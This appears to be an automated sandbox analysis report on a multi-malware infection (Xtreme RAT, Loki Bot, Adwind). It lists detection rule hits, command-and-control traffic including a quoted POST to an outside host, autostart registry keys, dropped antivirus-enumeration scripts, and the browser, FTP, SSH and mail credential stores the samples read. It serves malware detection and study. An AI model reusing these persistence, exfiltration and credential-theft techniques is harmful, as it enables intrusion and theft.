Source: 15.1.Server.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 34.2.iexplore.exe.c80000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 34.2.iexplore.exe.c80000.2.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 14.1.explorer.exe.1b80000.1.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 14.1.explorer.exe.1b80000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.0.svchost.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.0.svchost.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.0.Server.exe.c80000.1.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.0.Server.exe.c80000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.0.Server.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.0.Server.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.0.Server.exe.c80000.2.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.0.Server.exe.c80000.2.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 6.2.iexplore.exe.c80000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 6.2.iexplore.exe.c80000.2.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.2.Server.exe.c80000.1.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.2.Server.exe.c80000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 34.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 34.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.0.svchost.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.0.svchost.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 34.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 34.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.290000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.290000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.0.Server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.0.Server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.1.server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.1.server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.290000.1.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.290000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 6.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 6.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C86946 SetWindowsHookExW 0000000D,Function_00006748,00000000,00000000 | 3_2_00C86946
Contains functionality to read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8389C OpenClipboard,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard | 3_2_00C8389C
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8389C OpenClipboard,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard | 3_2_00C8389C
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_004254C8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette | 12_2_004254C8
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C86748 GetKeyboardState,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,VirtualAlloc,SendMessageA,CallNextHookEx | 3_2_00C86748

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | Process created: C:\Windows\System32\cmd.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 12_2_00481C0C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 12_2_00481FD4

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49188 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49189 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49190 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49191 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49192 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49193 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49194 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49196 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49199 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49205 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49211 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49216 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49220 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49221 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49224 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49225 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49226 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49228 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49230 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49231 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49233 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49234 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49235 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49236 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49239 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49240 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49242 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49243 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49245 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49246 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49248 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49249 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49250 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49253 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49255 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49260 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49266 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49270 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49275 -> 185.208.211.131:2379
Contains functionality to upload files via FTP
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 3_2_00C87918
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 3_1_00C87918
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 5_2_00C87918
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 6_2_00C87918
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 15_2_00C87918
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle | 15_1_00C87918
Contains functionality to download additional files from the internet
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C837C0 DeleteUrlCacheEntryW,DeleteFileW,URLDownloadToFileW | 3_2_00C837C0
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: fashionstune.com
Posts data to webserver
Source: unknown | HTTP traffic detected:
  POST /old/inc/img/five/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: fashionstune.com
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: F85E9006
  Content-Length: 186
  Connection: close
Urls found in memory or binary data
Source: server.exe, svchost.exe, iexplore.exe, explorer.exe, Server.exe | String found in binary or memory: http://

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\AppData\Local\Temp\server.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLM
Creates an undocumented autostart registry key
Source: C:\Users\user\AppData\Local\Temp\server.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA} StubPath
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\sxz.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run sxz.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLM
Source: C:\Users\user\AppData\Local\Temp\server.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run HKCU
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 358saxio.exe
Creates an autostart registry key
Source: C:\Users\user\Desktop\sxz.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run sxz.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLM
Source: C:\Users\user\AppData\Local\Temp\server.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run HKCU
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 358saxio.exe

Remote Access Functionality:

ADWIND Rat detected
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Dropped file:
  Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
  Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
  For Each objItem in colItems
    With objItem
      WScript.Echo "{""AV"":""" & .displayName & """}"
    End With
  Next
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Dropped file:
  Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
  Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
  For Each objItem in colItems
    With objItem
      WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
    End With
  Next
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | Dropped file:
  Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
  Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
  For Each objItem in colItems
    With objItem
      WScript.Echo "{""AV"":""" & .displayName & """}"
    End With
  Next
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | Dropped file:
  Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
  Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
  For Each objItem in colItems
    With objItem
      WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
    End With
  Next
Java source code contains strings found in CrossRAT
Source: uroi.jar.2.dr | Suspicious string: operational.JRat (in operational/Jrat.java)
Source: _0.71076688945376033550400146700531635.class.4.dr | Suspicious string: operational.JRat (in operational/Jrat.java)

Stealing of Sensitive Information:

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\SimonTatham\PuTTY\Sessions
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\Martin Prikryl
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: HKEY_USERS\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: HKEY_USERS\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: HKEY_USERS\Software\Far\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File opened: HKEY_USERS\Software\FlashPeak\BlazeFtp\Settings
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Searches for user specific document files
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\Documents

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\explorer.exe | Executable created and started: C:\Windows\InstallDir\Server.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
Drops PE files
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
